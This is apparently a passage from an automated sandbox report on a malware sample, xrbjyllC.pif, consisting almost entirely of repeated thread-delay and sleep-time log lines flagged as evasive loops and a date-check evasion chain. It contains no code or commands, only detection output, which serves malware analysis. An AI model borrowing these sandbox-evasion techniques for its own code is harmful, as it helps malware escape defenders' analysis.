Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596981	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596875	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596767	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596640	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596528	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596416	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596304	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596188	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596050	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595938	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595810	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595698	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595585	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595249	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595123	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594911	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594789	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594677	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594564	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594439	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594313	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594177	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 593997	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 593860	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 593658	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 593506	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 593369	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 593196	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 593011	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 592620	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 592105	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 591918	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 591659	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 600000
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599891
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599781
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599672
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599562
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599453
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599344
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599234
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599124
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599007
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598891
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598780
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598422
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598297
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598172
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598062
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597953
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597844
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597719
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597609
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597500
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597391
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597281
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597172
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597062
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596953
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596844
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596734
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596625
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596515
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596406
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596297
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596187
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596078
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595932
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595813
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595700
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595579
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595466
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595344
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595234
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595125
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595016
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594906
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594797
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594687
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594578
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594469
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594344
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594234
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594125
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 600000
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599889
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599781
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599671
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599562
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599453
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599343
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599234
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599125
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599015
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598906
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598796
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598686
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598578
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598461
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598310
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598185
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598078
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597968
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597859
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597750
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597640
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597531
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597421
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597312
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597203
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597093
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596981
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596875
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596765
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596656
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596546
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596437
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596328
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596218
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596109
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595999
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595890
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595781
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595671
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595562
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595453
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595343
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595234
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595125
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595015
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594891
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594765
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594656
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594546
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594437

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\Public\Libraries\xrbjyllC.pif	Window / User API: threadDelayed 2941	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Window / User API: threadDelayed 6101	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Window / User API: threadDelayed 1823
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Window / User API: threadDelayed 8024
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Window / User API: threadDelayed 7725
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Window / User API: threadDelayed 2129

Found evasive API chain (date check)

Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe

Evasive API call chain: GetLocalTime,DecisionNodes

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep count: 34 > 30	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -31359464925306218s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4144	Thread sleep count: 2941 > 30	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4144	Thread sleep count: 6101 > 30	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -599438s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -599313s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -599203s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -599094s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -598969s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -598860s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -598735s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -598610s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -598485s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -598360s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -598222s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -598068s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -597946s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -597844s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -597719s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -597610s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -597485s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -597360s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -597235s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -597110s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -596981s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -596875s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -596767s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -596640s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -596528s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -596416s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -596304s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -596188s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -596050s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -595938s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -595810s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -595698s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -595585s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -595249s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -595123s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -594911s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -594789s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -594677s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -594564s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -594439s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -594313s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -594177s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -593997s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -593860s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -593658s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -593506s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -593369s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -593196s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -593011s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -592620s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -592105s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -591918s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 6024	Thread sleep time: -591659s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep count: 34 > 30
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -31359464925306218s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -600000s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4312	Thread sleep count: 1823 > 30
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4312	Thread sleep count: 8024 > 30
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -599891s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -599781s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -599672s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -599562s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -599453s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -599344s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -599234s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -599124s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -599007s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -598891s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -598780s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -598422s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -598297s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -598172s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -598062s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -597953s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -597844s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -597719s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -597609s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -597500s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -597391s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -597281s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -597172s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -597062s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -596953s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -596844s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -596734s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -596625s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -596515s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -596406s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -596297s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -596187s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -596078s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -595932s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -595813s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -595700s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -595579s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -595466s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -595344s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -595234s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -595125s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -595016s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -594906s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -594797s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -594687s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -594578s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -594469s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -594344s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -594234s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 3428	Thread sleep time: -594125s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -28592453314249787s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -600000s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -599889s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -599781s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -599671s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -599562s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -599453s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -599343s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -599234s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -599125s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -599015s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -598906s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -598796s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -598686s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -598578s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -598461s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -598310s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -598185s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -598078s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -597968s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -597859s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -597750s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -597640s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -597531s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -597421s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -597312s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -597203s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -597093s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -596981s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -596875s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -596765s >= -30000s
Source: C:\Users\Public\Libraries\xrbjyllC.pif TID: 4456	Thread sleep time: -596656s >= -30000s
